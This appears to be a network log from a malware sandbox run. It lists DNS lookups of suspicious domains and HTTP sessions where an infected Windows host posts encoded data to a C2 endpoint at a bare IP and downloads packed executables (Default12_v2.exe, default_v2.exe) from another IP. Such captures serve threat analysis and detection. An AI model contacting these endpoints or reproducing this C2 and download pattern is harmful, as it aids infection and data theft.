May 24, 2024 09:43:13.839447021 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		186.112.12.192	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839447021 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		190.147.2.86	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839447021 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		212.112.110.243	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839447021 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		200.63.106.141	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839447021 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		183.100.39.16	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839447021 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		211.171.233.126	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839447021 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		187.223.47.95	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839447021 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		186.4.194.68	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839447021 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		189.181.49.206	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839484930 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		125.7.253.10	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839484930 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		186.112.12.192	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839484930 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		190.147.2.86	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839484930 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		212.112.110.243	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839484930 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		200.63.106.141	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839484930 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		183.100.39.16	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839484930 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		211.171.233.126	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839484930 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		187.223.47.95	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839484930 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		186.4.194.68	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839484930 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		189.181.49.206	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839513063 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		125.7.253.10	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839513063 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		186.112.12.192	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839513063 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		190.147.2.86	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839513063 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		212.112.110.243	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839513063 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		200.63.106.141	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839513063 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		183.100.39.16	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839513063 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		211.171.233.126	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839513063 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		187.223.47.95	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839513063 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		186.4.194.68	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:13.839513063 CEST	1.1.1.1	192.168.2.4	0x664b	No error (0)	cajgtus.com		189.181.49.206	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:15.504957914 CEST	1.1.1.1	192.168.2.4	0x922d	No error (0)	employhabragaomlsp.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:15.504957914 CEST	1.1.1.1	192.168.2.4	0x922d	No error (0)	employhabragaomlsp.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:16.346072912 CEST	1.1.1.1	192.168.2.4	0x3233	No error (0)	ipinfo.io		34.117.186.192	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:17.027962923 CEST	1.1.1.1	192.168.2.4	0xbb91	No error (0)	db-ip.com		104.26.4.15	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:17.027962923 CEST	1.1.1.1	192.168.2.4	0xbb91	No error (0)	db-ip.com		104.26.5.15	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:17.027962923 CEST	1.1.1.1	192.168.2.4	0xbb91	No error (0)	db-ip.com		172.67.75.166	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:21.640875101 CEST	1.1.1.1	192.168.2.4	0xdae6	No error (0)	steamcommunity.com		104.102.42.29	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:25.250602007 CEST	1.1.1.1	192.168.2.4	0x3c7b	No error (0)	api.2ip.ua		188.114.96.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:25.250602007 CEST	1.1.1.1	192.168.2.4	0x3c7b	No error (0)	api.2ip.ua		188.114.97.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:39.705919027 CEST	1.1.1.1	192.168.2.4	0xb9a9	No error (0)	employhabragaomlsp.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:39.705919027 CEST	1.1.1.1	192.168.2.4	0xb9a9	No error (0)	employhabragaomlsp.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:42.719599962 CEST	1.1.1.1	192.168.2.4	0x57b4	No error (0)	service-domain.xyz		54.210.117.250	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:42.766845942 CEST	1.1.1.1	192.168.2.4	0x8278	No error (0)	www.rapidfilestorage.com	env-3936544.jcloud.kz		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 09:43:42.766845942 CEST	1.1.1.1	192.168.2.4	0x8278	No error (0)	env-3936544.jcloud.kz		185.22.66.16	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:42.766845942 CEST	1.1.1.1	192.168.2.4	0x8278	No error (0)	env-3936544.jcloud.kz		185.22.66.15	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:43.661004066 CEST	1.1.1.1	192.168.2.4	0xc47c	No error (0)	ipinfo.io		34.117.186.192	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:43.748081923 CEST	1.1.1.1	192.168.2.4	0xfaf9	No error (0)	helsinki-dtc.com		194.67.87.38	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:44.371620893 CEST	1.1.1.1	192.168.2.4	0x318b	No error (0)	db-ip.com		104.26.5.15	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:44.371620893 CEST	1.1.1.1	192.168.2.4	0x318b	No error (0)	db-ip.com		172.67.75.166	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:44.371620893 CEST	1.1.1.1	192.168.2.4	0x318b	No error (0)	db-ip.com		104.26.4.15	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:44.662038088 CEST	1.1.1.1	192.168.2.4	0x6143	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 09:43:44.662038088 CEST	1.1.1.1	192.168.2.4	0x6143	No error (0)	googlehosted.l.googleusercontent.com		216.58.206.65	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:45.014914989 CEST	1.1.1.1	192.168.2.4	0x19fa	No error (0)	skrptfiles.tracemonitors.com	d1u0l9f6kr1di3.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 09:43:45.014914989 CEST	1.1.1.1	192.168.2.4	0x19fa	No error (0)	d1u0l9f6kr1di3.cloudfront.net		108.156.60.94	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:45.014914989 CEST	1.1.1.1	192.168.2.4	0x19fa	No error (0)	d1u0l9f6kr1di3.cloudfront.net		108.156.60.70	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:45.014914989 CEST	1.1.1.1	192.168.2.4	0x19fa	No error (0)	d1u0l9f6kr1di3.cloudfront.net		108.156.60.62	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:45.014914989 CEST	1.1.1.1	192.168.2.4	0x19fa	No error (0)	d1u0l9f6kr1di3.cloudfront.net		108.156.60.71	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:49.153517008 CEST	1.1.1.1	192.168.2.4	0x63cd	No error (0)	www.rapidfilestorage.com	env-3936544.jcloud.kz		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 09:43:49.153517008 CEST	1.1.1.1	192.168.2.4	0x63cd	No error (0)	env-3936544.jcloud.kz		185.22.66.15	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:49.153517008 CEST	1.1.1.1	192.168.2.4	0x63cd	No error (0)	env-3936544.jcloud.kz		185.22.66.16	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:50.430763960 CEST	1.1.1.1	192.168.2.4	0x1a52	No error (0)	api4.check-data.xyz	checkdata-1114476139.us-west-2.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
May 24, 2024 09:43:50.430763960 CEST	1.1.1.1	192.168.2.4	0x1a52	No error (0)	checkdata-1114476139.us-west-2.elb.amazonaws.com		44.235.180.78	A (IP address)	IN (0x0001)	false
May 24, 2024 09:43:50.430763960 CEST	1.1.1.1	192.168.2.4	0x1a52	No error (0)	checkdata-1114476139.us-west-2.elb.amazonaws.com		44.237.26.169	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 09:41:58.396104097 CEST	207	OUT	GET /api/bing_release.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 85.192.56.26
May 24, 2024 09:41:59.103802919 CEST	261	IN	HTTP/1.1 200 OK Date: Fri, 24 May 2024 07:41:58 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 68 61 72 72 79 33 31 33 Data Ascii: harry313
May 24, 2024 09:42:02.756756067 CEST	271	OUT	POST /api/flash.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Length: 113 Host: 85.192.56.26
May 24, 2024 09:42:02.756804943 CEST	113	OUT	Data Raw: 64 61 74 61 3d 45 51 78 75 4d 66 62 5a 51 41 2d 41 58 79 35 57 56 77 6c 4e 6a 4f 4e 42 49 32 4f 49 73 74 58 6f 32 30 44 47 66 59 7a 50 61 44 62 4b 66 52 43 32 55 6a 32 4b 4f 48 7a 45 65 37 4c 4e 69 6c 65 48 57 63 68 75 38 73 6f 36 4e 6b 4e 72 34 Data Ascii: data=EQxuMfbZQA-AXy5WVwlNjONBI2OIstXo20DGfYzPaDbKfRC2Uj2KOHzEe7LNileHWchu8so6NkNr4KwKGCPIaU0PlZ3jCELv2kNCmDfSFG8=
May 24, 2024 09:42:03.310216904 CEST	382	IN	HTTP/1.1 200 OK Date: Fri, 24 May 2024 07:42:02 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 128 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 66 33 42 41 4b 38 55 63 56 48 2b 41 36 63 74 36 68 6f 31 4c 43 39 48 44 45 4a 54 36 74 36 54 77 73 43 78 47 42 4a 52 62 63 51 41 6a 4e 4e 4e 36 64 6c 6f 6f 47 6c 35 41 52 59 4b 59 4f 55 2b 5a 49 57 52 6f 78 73 68 6e 6a 4a 4f 4e 79 46 7a 63 50 2f 72 49 46 64 78 64 59 4c 48 53 77 58 34 4d 71 33 6e 56 6d 70 42 55 51 73 62 37 4d 4a 4b 45 37 4b 6b 63 6d 48 34 59 4f 35 36 35 7a 61 6e 32 Data Ascii: f3BAK8UcVH+A6ct6ho1LC9HDEJT6t6TwsCxGBJRbcQAjNNN6dlooGl5ARYKYOU+ZIWRoxshnjJONyFzcP/rIFdxdYLHSwX4Mq3nVmpBUQsb7MJKE7KkcmH4YO565zan2
May 24, 2024 09:42:03.533360004 CEST	271	OUT	POST /api/flash.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Length: 133 Host: 85.192.56.26
May 24, 2024 09:42:03.533392906 CEST	133	OUT	Data Raw: 64 61 74 61 3d 35 72 31 72 77 4b 50 66 47 37 44 76 57 39 78 49 49 4c 46 64 30 55 56 74 46 72 59 73 7a 5f 76 65 2d 67 66 67 31 59 68 4e 59 75 6b 35 6b 4b 73 54 7a 30 6f 61 33 42 35 72 6d 6f 4d 6c 63 42 65 6c 44 51 45 5f 45 36 77 67 48 4a 63 67 62 Data Ascii: data=5r1rwKPfG7DvW9xIILFd0UVtFrYsz_ve-gfg1YhNYuk5kKsTz0oa3B5rmoMlcBelDQE_E6wgHJcgbja3zlMetkoP6d7w8M3yMZiAVcb2hQ7vZB51Te1jSDcBOv0oyYIw
May 24, 2024 09:42:04.177788019 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 24 May 2024 07:42:03 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 4480 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 65 4f 7a 32 39 35 31 67 47 30 4c 79 53 56 4b 64 4c 47 57 34 65 57 2f 55 6e 59 38 65 79 49 66 44 5a 6f 2f 31 2f 2f 2b 31 74 44 34 69 5a 51 2b 32 45 54 75 47 72 4b 79 76 64 4d 6d 34 42 4a 34 4b 48 42 49 36 42 30 52 78 31 6d 76 37 43 39 6b 4e 50 6f 46 34 38 61 6e 4c 32 48 53 5a 34 73 4c 58 42 42 6f 54 74 6d 6c 48 34 44 4c 62 6b 6c 6f 33 78 6b 58 36 6f 79 42 46 4d 65 76 32 7a 6f 43 4b 4c 4e 68 4d 58 36 31 6f 4d 35 71 64 73 63 55 69 6a 68 47 35 58 69 35 74 69 6f 78 46 48 6d 55 7a 42 70 61 68 33 55 62 56 58 31 76 6a 30 55 64 4a 62 65 6d 31 6f 71 78 59 66 57 47 2f 30 69 6f 6e 59 37 45 49 47 38 4e 34 77 35 34 6b 47 44 34 4e 6d 61 35 50 63 37 56 55 4a 51 34 36 71 4f 69 62 7a 78 55 78 2f 78 62 67 76 35 62 59 74 37 45 48 7a 7a 4c 78 57 74 4a 41 41 36 4d 68 2b 51 48 64 74 34 51 6d 6d 48 46 6a 42 58 47 4a 6b 76 62 75 49 4f 64 49 57 6e 39 4a 59 65 74 4a 35 32 50 69 4f 2f 4a 55 4a 6c 50 30 58 47 53 58 4f 6b 47 43 52 77 41 4c 35 73 4a 64 78 71 4c 58 61 6e 37 4f 6a 62 4b 50 63 77 4b 62 55 78 43 73 48 49 6c 61 39 32 [TRUNCATED] Data Ascii: eOz2951gG0LySVKdLGW4eW/UnY8eyIfDZo/1//+1tD4iZQ+2ETuGrKyvdMm4BJ4KHBI6B0Rx1mv7C9kNPoF48anL2HSZ4sLXBBoTtmlH4DLbklo3xkX6oyBFMev2zoCKLNhMX61oM5qdscUijhG5Xi5tioxFHmUzBpah3UbVX1vj0UdJbem1oqxYfWG/0ionY7EIG8N4w54kGD4Nma5Pc7VUJQ46qOibzxUx/xbgv5bYt7EHzzLxWtJAA6Mh+QHdt4QmmHFjBXGJkvbuIOdIWn9JYetJ52PiO/JUJlP0XGSXOkGCRwAL5sJdxqLXan7OjbKPcwKbUxCsHIla92KiHlqwWXFKd/Yo3WFyhJI1Q15nS3vm7EDAtLAVoFBs1G4C6Vhs56NIoQl1xmXYlhPlJGoAVTGqQGNsmvWasTLtGLLYLKEfJOYvtWK/90RwtKqqc6dtvX89illFyvbu6bCHLWc56QvBoI/zhcamUi45XGC4PdinFnyBBKR2NXkObdOCEiyejEXu27N6Q7Yl9iQv17WpO950+WwUIolg0QhbWqTb01oith/hsGwlcAGVZJ1Iubs3xzGKswlhwhaqluX2R4DwbaQe92G1Yq+psGd2yxoakpbSWNgmB4U1BqRbr2mnAFEzHEvsZaGTICk4HlqEdEbsqUDlWlobaEdYCCUnEiDOeYJZYInHrCZijZA2bKvz3mFdxV95boUk/gEqIT3OZ8cJujw2A8Xxpz3tLBxQirC1cQsJPAmA4hE35uv+0EDBfsCLZtI6yocS/aE+0fLRrLd6K1zRag/kyP9rZRK8SJdYdIud3oWgkzgLBwg7YSFwnkuSEvfi+24kRtPCVPJJ3lkBHdOBj4DqBzMs5faEEIHocRiF9NuWoFkjzz2f732iO9u1O/f5yCUj5/bWl0hZ1qmn1ZsdN76ZtT6ZdzO2taa4+V84Ed/91eIpzAvJsMATzQjMQlKkC+hSW/RRCmsgE
May 24, 2024 09:42:04.177978992 CEST	1236	IN	Data Raw: 45 72 77 76 55 52 33 30 41 57 70 68 4c 54 32 61 42 69 56 76 47 44 49 30 58 71 4f 53 74 59 67 65 30 32 53 58 65 71 73 4e 62 41 61 4c 57 4e 6d 35 79 54 33 48 2b 51 42 6a 58 5a 35 6b 70 47 2b 52 4d 56 4a 32 62 34 6d 67 70 30 43 4e 6c 66 51 43 70 6c Data Ascii: ErwvUR30AWphLT2aBiVvGDI0XqOStYge02SXeqsNbAaLWNm5yT3H+QBjXZ5kpG+RMVJ2b4mgp0CNlfQCplygsJACss+yxmweruIhQQW0ASn2sWRZNg1vCwHR4oOy142C316y58WWqXCDwMhypPTq1JuyV7xKfApx/LwagbvZGnAIXlbV0uFDmrql+Hv9KzkYUr4yuU+09vMI7t//9ew860IoeHGubyaQNnlSL6tVkMvqxqRWb+z
May 24, 2024 09:42:04.181308985 CEST	1236	IN	Data Raw: 33 56 4a 67 79 50 76 4b 70 74 4b 59 7a 51 6b 50 5a 52 70 70 54 39 65 47 46 4e 32 32 7a 7a 6b 72 37 4d 30 36 53 79 57 4e 54 4c 65 44 37 75 69 32 42 69 79 73 43 61 70 6e 46 5a 59 75 48 6c 78 52 7a 6f 46 71 61 4f 79 4b 55 58 77 30 44 79 2f 53 71 68 Data Ascii: 3VJgyPvKptKYzQkPZRppT9eGFN22zzkr7M06SyWNTLeD7ui2BiysCapnFZYuHlxRzoFqaOyKUXw0Dy/SqhAv6mfPeHbYw1xR2UqlkRD4e8gDlK438zMcTh+aBrSL9X1YDOOX/JyL8EhShhNodzmNiKLPa1PxHiv10J84vz5Fzv6bhGsgQ22pGccHZDnFheQ34ltSHYwU5R+6LcqTB3eLw+mmWHwo4M6GemXySCVDVf3uApEb9Th
May 24, 2024 09:42:04.184865952 CEST	1027	IN	Data Raw: 6d 2f 74 74 76 45 50 59 38 41 53 54 4a 58 6a 69 47 58 77 71 6f 63 36 35 2b 53 63 6d 4b 34 4e 77 54 53 6c 52 71 64 7a 38 2b 6e 52 52 31 32 41 7a 37 33 74 74 48 4a 52 72 73 31 37 59 5a 44 6c 31 4d 66 50 76 65 2f 67 74 68 4a 37 31 36 79 7a 67 73 65 Data Ascii: m/ttvEPY8ASTJXjiGXwqoc65+ScmK4NwTSlRqdz8+nRR12Az73ttHJRrs17YZDl1MfPve/gthJ716yzgseoUz9nP2lAK/5K0C98ui4Sxga7o0YoS95k9TERpCP3tG77y/UmIfgC0IbDeorGuoZetQ7eN5dWCxaPQKyM041MQ1az+pmzJDrqTwxWkWSQWgs70d9ltI9dx7ZCZOeJbaYJMrTpwnGRW3L2rx+PPJrRFxefK6QxYgVI
May 24, 2024 09:42:04.236807108 CEST	1027	IN	Data Raw: 6d 2f 74 74 76 45 50 59 38 41 53 54 4a 58 6a 69 47 58 77 71 6f 63 36 35 2b 53 63 6d 4b 34 4e 77 54 53 6c 52 71 64 7a 38 2b 6e 52 52 31 32 41 7a 37 33 74 74 48 4a 52 72 73 31 37 59 5a 44 6c 31 4d 66 50 76 65 2f 67 74 68 4a 37 31 36 79 7a 67 73 65 Data Ascii: m/ttvEPY8ASTJXjiGXwqoc65+ScmK4NwTSlRqdz8+nRR12Az73ttHJRrs17YZDl1MfPve/gthJ716yzgseoUz9nP2lAK/5K0C98ui4Sxga7o0YoS95k9TERpCP3tG77y/UmIfgC0IbDeorGuoZetQ7eN5dWCxaPQKyM041MQ1az+pmzJDrqTwxWkWSQWgs70d9ltI9dx7ZCZOeJbaYJMrTpwnGRW3L2rx+PPJrRFxefK6QxYgVI

Timestamp	Bytes transferred	Direction	Data
May 24, 2024 09:42:04.431566954 CEST	213	OUT	HEAD /download/th/getimage12.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 5.42.66.10 Cache-Control: no-cache
May 24, 2024 09:42:05.133013010 CEST	394	IN	HTTP/1.1 200 OK Date: Fri, 24 May 2024 07:42:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Description: File Transfer Content-Disposition: attachment; filename=Default12_v2.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Content-Length: 3134976 Content-Type: application/octet-stream
May 24, 2024 09:42:05.133264065 CEST	208	OUT	HEAD /download/th/space.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 5.42.66.10 Cache-Control: no-cache
May 24, 2024 09:42:05.424082994 CEST	392	IN	HTTP/1.1 200 OK Date: Fri, 24 May 2024 07:42:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Description: File Transfer Content-Disposition: attachment; filename=default_v2.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Content-Length: 3098112 Content-Type: application/octet-stream
May 24, 2024 09:42:05.424345970 CEST	212	OUT	GET /download/th/getimage12.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: 5.42.66.10 Cache-Control: no-cache
May 24, 2024 09:42:05.644553900 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 24 May 2024 07:42:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Description: File Transfer Content-Disposition: attachment; filename=Default12_v2.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public Content-Length: 3134976 Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 14 69 4c 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 bc 15 00 00 8c 18 00 00 00 00 00 fa 61 35 00 00 10 00 00 00 d0 15 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 70 00 00 04 00 00 af 9e 30 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 3f 33 00 2c 01 00 00 00 f0 5a 00 02 26 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 5a 00 5c 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 70 2d 00 18 00 00 00 50 c7 5a 00 40 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELiLf'a5@ p0@?3,Z&Z\xp-PZ@0+A8@.text `.rdata2~@@.data0IP@.vmp `.vmp0+@.vmp /@+/ `.reloc\Z/@@.rsrc&Z /@@
May 24, 2024 09:42:05.644794941 CEST	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: h:Y16,B1
May 24, 2024 09:42:05.645190954 CEST	1236	IN	Data Raw: 36 00 00 00 00 00 73 00 00 80 00 00 00 00 3c bb 39 00 00 00 00 00 c2 de 2f 00 00 00 00 00 0e b5 35 00 00 00 00 00 04 12 33 00 00 00 00 00 6e aa 37 00 00 00 00 00 5e 12 34 00 00 00 00 00 ae bd 3c 00 46 2f 3c 00 ce 50 39 00 08 b3 5a 00 30 5f 32 00 Data Ascii: 6s<9/53n7^4<F/<P9Z0_2J1
May 24, 2024 09:42:05.645224094 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 24, 2024 09:42:05.649364948 CEST	1236	IN	Data Raw: fe db f5 0c d5 bc fc 11 17 25 14 df 67 72 ef fe 21 17 e5 bb 38 6f d3 6e 17 85 47 6e 3e cb 9f 0f 74 b7 8b cf 35 56 32 4f ff 40 8c 9f 07 e4 55 e6 ab 33 54 c6 07 cc f1 21 ce 98 09 aa a7 1a 4b 8a d1 46 5c c5 e8 29 1b 6e 17 f5 4e 96 45 65 75 74 31 64 Data Ascii: %gr!8onGn>t5V2O@U3T!KF\)nNEeut1d}u8u{eGF-#-uQ)S#O&{!s$\&x\->ca03~,c\)BS4u`u A5CyY1cmq(GFBX}s&5&>
May 24, 2024 09:42:05.649395943 CEST	32	IN	Data Raw: 6b 00 00 bb 7c 8d b5 32 b0 1d 00 00 3c 76 c8 dc 40 5b c0 f3 4c e6 ff 56 de fc dc 27 23 71 b5 84 Data Ascii: k\|2<v@[LV'#q
May 24, 2024 09:42:05.756766081 CEST	1236	IN	Data Raw: 70 cd 5a e6 a9 aa c7 50 eb dd 1e 07 0f 9e c9 64 c6 77 6d 0b e1 11 7b 58 84 ee 08 91 f7 00 bf 94 12 50 6c 46 ea 8d 1e 47 33 5a d3 54 5d 65 00 00 00 00 7c 57 b0 bf 11 3d 44 78 9b 41 c0 14 38 19 05 cf bb 2c 67 85 89 f5 99 2d 6c 85 a0 19 32 64 e1 c9 Data Ascii: pZPdwm{XPlFG3ZT]e\|W=DxA8,g-l2d!vx)`=8Y:_5``ak8UM;"9XJ$hM'.X4+kh\aZQaaa9R8V[.z\oEmqw'cEAI}`
May 24, 2024 09:42:05.757021904 CEST	1236	IN	Data Raw: d5 e7 d1 c3 0b 03 43 02 08 1b 61 6d 67 8d 7d 77 04 d8 d2 ea 3c 5a 45 28 cf cc 8a f8 ab cd 43 60 6a 08 92 4f 64 51 43 8b 83 43 45 e8 1b 61 6d 76 7c 95 9f 1a ab 21 01 98 92 7b f1 d8 52 3d 72 e9 2f 4a c3 a1 3e 5e 49 c5 e7 fc 45 90 98 55 78 2b 52 27 Data Ascii: Camg}w<ZE(C`jOdQCCEamv\|!{R=r/J>^IEUx+R'UlambO\@Ka`x}Ws\|O5y'q&]EIV)$TY>l1iME1iV4qF`9~\|GOk
